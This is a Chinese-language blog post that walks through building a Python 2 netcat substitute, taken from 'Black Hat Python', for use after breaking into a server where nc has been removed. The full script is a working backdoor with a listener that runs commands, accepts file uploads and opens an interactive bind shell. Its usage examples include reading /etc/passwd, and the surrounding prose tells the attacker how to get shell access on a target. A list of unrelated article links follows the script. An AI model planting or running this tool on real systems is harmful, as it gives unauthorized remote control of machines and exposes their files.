nc即netcat,是网络界的瑞士军刀。当入侵了一个服务器之后,发现nc工具已经被系统管理员移除之后,可以自己制作一个简单的客户端和服务器端来实现①上传文件②执行命令③开启一个新的命令行shell等几个功能。

 __author__ = 'seven'

 import sys

 import socket

 import getopt

 import threading

 import subprocess

 listen = False

 command = False

 upload = False

 execute = ""

 target = ""

 upload_destination = ""

 port = 0

 def usage():

     print "BHP Net Tool"

     print

     print "Usage: netcat.py -t target_host -p port"

     print "-l --listen                - listen on [host]:[port] for incoming connections"

     print "-e --execute=file_to_run   - execute the given file upon receiving a connection"

     print "-c --command               - initialize a command shell"

     print "-u --upload=destination    - upon receiving connection upload a file and write to [destination]"

     print

     print

     print "Examples: "

     print "netcat.py -t 192.168.0.1 -p 5555 -l -c"

     print "netcat.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"

     print "netcat.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""

     print "echo 'ABCDEFGHI' | ./netcat.py -t 192.168.11.12 -p 135"

     sys.exit(0)

 def client_sender(buffer):

     client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

     try:

         client.connect((target, port))

         if len(buffer):

             client.send(buffer)

         while True:

             recv_len = 1

             response = ""

             while recv_len:

                 data = client.recv(4096)

                 recv_len = len(data)

                 response += data

                 if recv_len < 4096:

                     break

             print response,

             buffer = raw_input("")

             buffer += "\n"

             client.send(buffer)

     except:

         print "[*] Exception! Exiting."

         client.close()

 def server_loop():

     global target

     if not len(target):

         target = "0.0.0.0"

     server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

     server.bind((target, port))

     server.listen(5)

     while True:

         client_socket, addr = server.accept()

         client_thread = threading.Thread(target=client_handler, args=(client_socket,))

         client_thread.start()

 def run_command(command):

     command = command.rstrip()

     try:

         output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)

     except:

         output = "Failed to execute command.\r\n"

     return output

 def client_handler(client_socket):

     global upload

     global execute

     global command

     if len(upload_destination):

         file_buffer = ""

         while True:

             data = client_socket.recv(1024)

             if not data:

                 break

             else:

                 file_buffer += data

         try:

             file_descriptor = open(upload_destination, "wb")

             file_descriptor.write(file_buffer)

             file_descriptor.close()

             client_socket.send("Successfully saved file to %s\r\n" % upload_destination)

         except:

             client_socket.send("Failed to save file to %s\r\n" % upload_destination)

     if len(execute):

         output = run_command(execute)

         client_socket.send(output)

     if command:

         while True:

             client_socket.send("<BHP:#> ")

             cmd_buffer = ""

             while "\n" not in cmd_buffer:

                 cmd_buffer += client_socket.recv(1024)

                 response = run_command(cmd_buffer)

                 client_socket.send(response)

 def main():

     global listen

     global port

     global execute

     global command

     global upload_destination

     global target

     if not len(sys.argv[1:]):

         usage()

     # read the commandline options

     try:

         opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:",

                                    ["help", "listen", "execute", "target", "port", "command", "upload"])

     except getopt.GetoptError as err:

         print str(err)

         usage()

     for o, a in opts:

         if o in ("-h", "--help"):

             usage()

         elif o in ("-l", "--listen"):

             listen = True

         elif o in ("-e", "--execution"):

             execute = a

         elif o in ("-t", "--target"):

             target = a

         elif o in ("-p", "--port"):

             port = int(a)

         elif o in ("-c", "--command"):

             command = True

         elif o in ("-u", "--upload"):

             upload_destination = a

         else:

             assert False, "Unhandled Option"

     if not listen and len(target) and port > 0:

         buffer = sys.stdin.read()

         client_sender(buffer)

     if listen:

         server_loop()

 main()

在主函数中,通过判断是否含有-l参数来决定是客户端还是服务器端。在实际应用中可以理解为,在目标服务器中作为服务器端以不同功能运行,监听来自攻击者主机的消息,例如以执行命令的功能运行,那么从攻击者主机发来的消息可能是一条命令,而如果以开启新的命令行shell的功能运行的话,那么攻击者主机就可以以命令行交互的方式访问目标服务器;攻击者主机作为客户端与目标服务器启动的程序连接,发送相应数据。

相应的一些例子:

开启两个终端,分别作为服务器端和客户端

服务器端

(图1)

客户端

(图2)

从图1中可以知道,-l参数说明开始监听,-c参数说明开启一个command shell,如果这操作在服务器上执行,那么意味着攻击者可以通过目标服务器的ip地址和9999端口对目标服务器进行访问并且可以以命令行交互的形式。图2就是一个简单的客户端连接,可以看到命令行交互的形式

这里补充一点:由于脚本读取的是标准输入知道接收到EOF(文件末尾)标志,所以看到图2会是这样。在Windows下是ctrl+z,在Linux下是ctrl+d。

Black Hat Python之#1:制作简单的nc工具的更多相关文章

  1. 用Canvas制作简单的画图工具

    今天用Canvas制作了一个画图工具,非常简单,功能也不是很多,主要有背景网格,画线,画圆,画矩形和画圆角矩形,也用到了canvas的一些基本知识,在这里一一列举. 1.线段的绘制: 如何绘制真正的1 ...

  2. 用Python和摄像头制作简单的延时摄影

    “延时摄影(英语:Time-lapse photography)是以一种较低的帧率拍 下图像或者视频,然后用正常或者较快的速率播放画面的摄影技术.在一段延时摄影视频中,物体或者景物缓慢变化的过程被压缩 ...

  3. PYTHON定义函数制作简单登录程序(详细)

    环境:python3.* 结构:   dict_name = {} #定义一个字典,后面用到 def newuser(): #定义注册函数 prompt1='login desired:' while ...

  4. Tkinter制作简单的python编辑器

    想要制作简单的python脚本编辑器,其中文字输入代码部分使用Tkinter中的Text控件即可实现. 但是问题是,如何实现高亮呢?参考python自带的编辑器:python27/vidle文件夹中的 ...

  5. python制作简单excel统计报表3之将mysql数据库中的数据导入excel模板并生成统计图

    python制作简单excel统计报表3之将mysql数据库中的数据导入excel模板并生成统计图 # coding=utf-8 from openpyxl import load_workbook ...

  6. python制作简单excel统计报表2之操作excel的模块openpyxl简单用法

    python制作简单excel统计报表2之操作excel的模块openpyxl简单用法 # coding=utf-8 from openpyxl import Workbook, load_workb ...

  7. 初学Python之爬虫的简单入门

    初学Python之爬虫的简单入门 一.什么是爬虫? 1.简单介绍爬虫   爬虫的全称为网络爬虫,简称爬虫,别名有网络机器人,网络蜘蛛等等. 网络爬虫是一种自动获取网页内容的程序,为搜索引擎提供了重要的 ...

  8. Highcharts使用教程(1):制作简单图表

    今天我们要使用JavaScript图表Highcharts制作简单的柱形图,我们已经安装好Highcharts,让我们开始制作图表吧. 步骤一 在网页中添加一个div.设置id,设置图表长.高.代码如 ...

  9. ZAM 3D 制作简单的3D字幕 流程(二)

    原地址:http://www.cnblogs.com/yk250/p/5663907.html 文中表述仅为本人理解,若有偏差和错误请指正! 接着 ZAM 3D 制作简单的3D字幕 流程(一) .本篇 ...

随机推荐

  1. SpringBoot:Demo

    目录 Demo 准备工作 登录+拦截器 Restful CRUD Restful架构 查询所有员工 添加员工 员工修改功能 HiddenHttpMethodFilter 删除员工 定制错误页面 注销功 ...

  2. System类&StringBuilder类

    System类 1.currentTimeMillis()方法 作用:获取当前系统时间的毫秒值[注意:从现在到1970年1月1日 00:00:00] 2.arraycopy(...)方法 作用:复制数 ...

  3. Qt线程池

    说明 Qt中可以有多种使用线程的方式: 继承 QThread,重写 run() 接口: 使用 moveToThread() 方法将 QObject 子类移至线程中,内部的所有使用信号槽的槽函数均在线程 ...

  4. 一条SQL的执行流程

  5. Redis 学习笔记(一) 字符串 SDS

    SDS 简单动态字符串. SDS的结构: struct sdshdr{ int len;//记录BUF数组中已使用字节的数量 ,等于SDS所八寸字符串的长度 int free;//记录BUF数组中未使 ...

  6. Day_09【常用API】扩展案例6_将用户给定的字符串首个字符大写,并分别加上"set"和"get"输出

    定义如下方法public static String getPropertyGetMethodName(String property) (1)该方法的参数为String类型,表示用户给定的成员变量的 ...

  7. 很好的awk教程

    讲的内容配合分析web log ,疗效很好! http://www.ibm.com/developerworks/cn/linux/l-cn-awk-httplog/ 出差归来,哈哈,吐槽的不必写了, ...

  8. Vue element-ui date-picker 结束时间大于开始时间且开始时间小于此刻(转)

    转载自:https://blog.csdn.net/wintersweetGirl/article/details/82461412 <el-form ref="form" ...

  9. day05:数组与字典常识(20170217)

    #1:数组功能的使用:print ("a4A".isdecimal()) #print ("18".isdigit()) #判断是否是数字print (&quo ...

  10. jQuery下实现等待指定元素加载完毕(可改成纯js版)

    http://www.poluoluo.com/jzxy/201307/233374.html 代码如下: jQuery.fn.wait = function (func, times, interv ...